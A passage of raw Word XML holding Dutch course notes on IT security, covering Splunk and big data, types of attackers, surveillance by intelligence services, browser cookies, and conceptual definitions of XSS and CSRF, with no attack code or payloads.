      </w:pPr>
      <w:r>
        <w:t>AD data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561F60A9" w14:textId="0B7224FB" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gegevens worden genormaliseerd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5623E58B" w14:textId="7252E475" w:rsidR="002A3D53" w:rsidRDefault="002A3D53" w:rsidP="002A3D53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Big data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A29D811" w14:textId="0B71649D" w:rsidR="002A3D53" w:rsidRDefault="002A3D53" w:rsidP="002A3D53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Meer en meer devices tegenwoordig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71134600" w14:textId="29DA6592" w:rsidR="002A3D53" w:rsidRDefault="002A3D53" w:rsidP="002A3D53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ieder device maakt contextinfo en logs aan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182DA332" w14:textId="0EA6D420" w:rsidR="002A3D53" w:rsidRDefault="002A3D53" w:rsidP="002A3D53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enorm berg aan data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A77528E" w14:textId="1F5297F4" w:rsidR="002A3D53" w:rsidRDefault="002A3D53" w:rsidP="002A3D53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Niet alleen security data</w:t>
      </w:r>
      <w:r w:rsidR="007E1CD8">
        <w:t xml:space="preserve"> = Operational Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEFAD34" w14:textId="0B7EC0C2" w:rsidR="00884069" w:rsidRDefault="007E1CD8" w:rsidP="007E1CD8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1CD8">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SPLUNK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = de beste Big Data Engine op dit moment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64758511" w14:textId="092DF8CE" w:rsidR="007E1CD8" w:rsidRDefault="007E1CD8" w:rsidP="007E1CD8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ken met elke soort data tom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AEA90A" w14:textId="556C01BD" w:rsidR="007E1CD8" w:rsidRDefault="007E1CD8" w:rsidP="007E1CD8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Doet aan indexing met key/value pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020A04EF" w14:textId="26663608" w:rsidR="00424DE5" w:rsidRDefault="007E1CD8" w:rsidP="007E1CD8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bestaan veel plugins voor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6FD5B4" w14:textId="66420B92" w:rsidR="007E1CD8" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="21" w:name="_Toc453378510"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Privacy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="3A338A01" w14:textId="77777777" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5"/>
    <w:p w14:paraId="0EC2DD9F" w14:textId="705C477C" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Soorten attackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7101BC" w14:textId="762D98C6" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Script kiddies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2F571C" w14:textId="25F44E01" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Onervaren, jong, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4AC855" w14:textId="1D232A32" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zoeken naar tools, scripts, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576A1E8F" w14:textId="1DC3C7BA" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aanvallen mislukken meestal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69167643" w14:textId="619094E6" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zullen eerder gegevens beschadigen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD1E6CF" w14:textId="4787796E" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Black Hats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AD2595" w14:textId="42E85160" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The Dark Side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334A4290" w14:textId="77AE5FBB" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zeer gerichte aanvallen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65869927" w14:textId="2359475D" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zeer veel ervaring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779B7EB8" w14:textId="64B93837" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ninja’s of the internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F74F3C9" w14:textId="3082EBC3" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>White Hats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B6637" w14:textId="323F35AF" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The good guys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB5623" w14:textId="02E59997" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Professionals die gaten opsporen en dichten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E245534" w14:textId="242E38BA" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bedrijven huren hen in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D41E656" w14:textId="53562272" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Meestal begonnen als Black Hat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C430CFE" w14:textId="4C0B1EB0" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Twee soorten bespionering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7455C5" w14:textId="1708C3BC" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Collectief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B3278F" w14:textId="72015963" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Geen direct contact, enkel info verzamelen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A521A6" w14:textId="4649C263" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Penetrerend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CF0CE6" w14:textId="6854F4AD" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Contact maken, vertrouwen winnen, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2E969D" w14:textId="6C3308AC" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Inlichtingendiensten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B8391" w14:textId="3B4C63A6" w:rsidR="00424DE5" w:rsidRDefault="008C6821" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mogen uw internet</w:t>
      </w:r>
      <w:r w:rsidR="00424DE5">
        <w:t>activiteiten nagaan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE094C2" w14:textId="033F08A5" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Google Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5D66D6" w14:textId="14FDA7E4" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Als ze op een systeem staan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B60CF" w14:textId="4A0495CF" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Huisbevel nodig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E9344" w14:textId="25FA8518" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>8/10 websites volgen uw bewegingen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF3F493" w14:textId="5E9B1CC5" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>FBI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D0AD75" w14:textId="76F55993" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DCS1000 = Carnivore = netwerkverkeer opslaan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FABA567" w14:textId="3D7A51AA" w:rsidR="00424DE5" w:rsidRDefault="00424DE5" w:rsidP="00424DE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Magic Lantern = Spyware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B30C2D1" w14:textId="62223EF5" w:rsidR="000E434E" w:rsidRDefault="000E434E" w:rsidP="000E434E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Browsermethoden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AEB9FE" w14:textId="6E202F2C" w:rsidR="000E434E" w:rsidRDefault="000E434E" w:rsidP="000E434E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sniffen naar IP/Cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D6163E" w14:textId="23D9EC46" w:rsidR="000E434E" w:rsidRDefault="000E434E" w:rsidP="000E434E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312F403A" w14:textId="62207D9D" w:rsidR="00843287" w:rsidRDefault="00843287" w:rsidP="00843287">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Slaat preferenties/activiteiten op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBFB8C6" w14:textId="28596915" w:rsidR="00843287" w:rsidRDefault="00843287" w:rsidP="00843287">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Slaat logingegevens op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137FC947" w14:textId="09211EA1" w:rsidR="00843287" w:rsidRDefault="00843287" w:rsidP="00843287">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Authentication Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0AB5A" w14:textId="6CDA839E" w:rsidR="00843287" w:rsidRPr="00D7692D" w:rsidRDefault="00843287" w:rsidP="00843287">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Max default size = </w:t>
      </w:r>
      <w:r w:rsidRPr="00843287">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>4KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA62540" w14:textId="77777777" w:rsidR="004E0481" w:rsidRDefault="004E0481" w:rsidP="004E0481">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Om veel data op te slaan worden nu enkel een ID er in gestopt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD7D928" w14:textId="104AB1B1" w:rsidR="00D7692D" w:rsidRDefault="004E0481" w:rsidP="004E0481">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De andere data wordt in een DB opgeslagen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A04E6" w14:textId="1C8F95C4" w:rsidR="004E0481" w:rsidRDefault="004E0481" w:rsidP="004E0481">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ze zoeken jouw informatie op aan de hand van de ID in de Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BEA557" w14:textId="7A4A01F5" w:rsidR="000E434E" w:rsidRDefault="000E434E" w:rsidP="000E434E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Banners/Webbugs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7937E867" w14:textId="3B4EF874" w:rsidR="006D62B8" w:rsidRDefault="00915EFC" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidR="006D62B8">
        <w:lastRenderedPageBreak/>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55354AD3" w14:textId="77777777" w:rsidR="006D62B8" w:rsidRDefault="006D62B8" w:rsidP="006D62B8"/>
    <w:p w14:paraId="3C52847B" w14:textId="77777777" w:rsidR="006D62B8" w:rsidRDefault="006D62B8" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Authenticatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6ADBE" w14:textId="44B14896" w:rsidR="006D62B8" w:rsidRDefault="006D62B8" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cookies bevatten jouw identiteit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B3D126" w14:textId="385BFF00" w:rsidR="006D62B8" w:rsidRDefault="006D62B8" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een hacker kan je cookie stelen en zich voordoen als u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D8A35" w14:textId="6DA0B672" w:rsidR="006D62B8" w:rsidRPr="006D62B8" w:rsidRDefault="009C7DDD" w:rsidP="006D62B8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Same-</w:t>
      </w:r>
      <w:r w:rsidR="006D62B8" w:rsidRPr="006D62B8">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>origin</w:t>
      </w:r>
      <w:r w:rsidR="00EB335A">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> princip</w:t>
      </w:r>
      <w:r w:rsidR="006D62B8" w:rsidRPr="006D62B8">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4778FF" w14:textId="3656DFB7" w:rsidR="006D62B8" w:rsidRDefault="006D62B8" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een script van site X kan enkel de cookies gebruiken die afkomstig zijn van domain X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615288CC" w14:textId="1CF74E81" w:rsidR="006D62B8" w:rsidRPr="00AB2729" w:rsidRDefault="006D62B8" w:rsidP="006D62B8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AB2729">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>XSS = Cross-Site-Scripting = Cookie Stealing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B27CFBF" w14:textId="585CD38F" w:rsidR="00935911" w:rsidRDefault="006D62B8" w:rsidP="001806CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidR="00D37964">
        <w:t>Same-O</w:t>
      </w:r>
      <w:r w:rsidR="00170B82">
        <w:t>rigin princip</w:t>
      </w:r>
      <w:r>
        <w:t>e omzeilen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69B11E" w14:textId="77777777" w:rsidR="00146279" w:rsidRDefault="00146279" w:rsidP="00146279">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Komen vaak voor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246EE315" w14:textId="120708C4" w:rsidR="00146279" w:rsidRDefault="00146279" w:rsidP="009C0A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CSRF komt</w:t>
      </w:r>
      <w:r w:rsidR="009C0A1A">
        <w:t xml:space="preserve"> ook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> op</w:t>
      </w:r>
      <w:r w:rsidR="00493817">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76440F" w14:textId="63873096" w:rsidR="00146279" w:rsidRDefault="00146279" w:rsidP="009C0A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Cross Site Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB27D8C" w14:textId="78FBC28C" w:rsidR="00146279" w:rsidRDefault="00146279" w:rsidP="009C0A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Session Riding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545FC455" w14:textId="056EB943" w:rsidR="00146279" w:rsidRDefault="00146279" w:rsidP="009C0A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= One-Click Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43426D75" w14:textId="12601822" w:rsidR="00146279" w:rsidRDefault="00146279" w:rsidP="009C0A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00B3440A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>request sturen met iemand anders zijn session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1208A7B2" w14:textId="77777777" w:rsidR="00146279" w:rsidRDefault="00146279" w:rsidP="009C0A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bv. Op een image klikken met een url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052F6D83" w14:textId="08DE3D61" w:rsidR="00146279" w:rsidRDefault="00146279" w:rsidP="009C0A1A">
      <w:pPr>
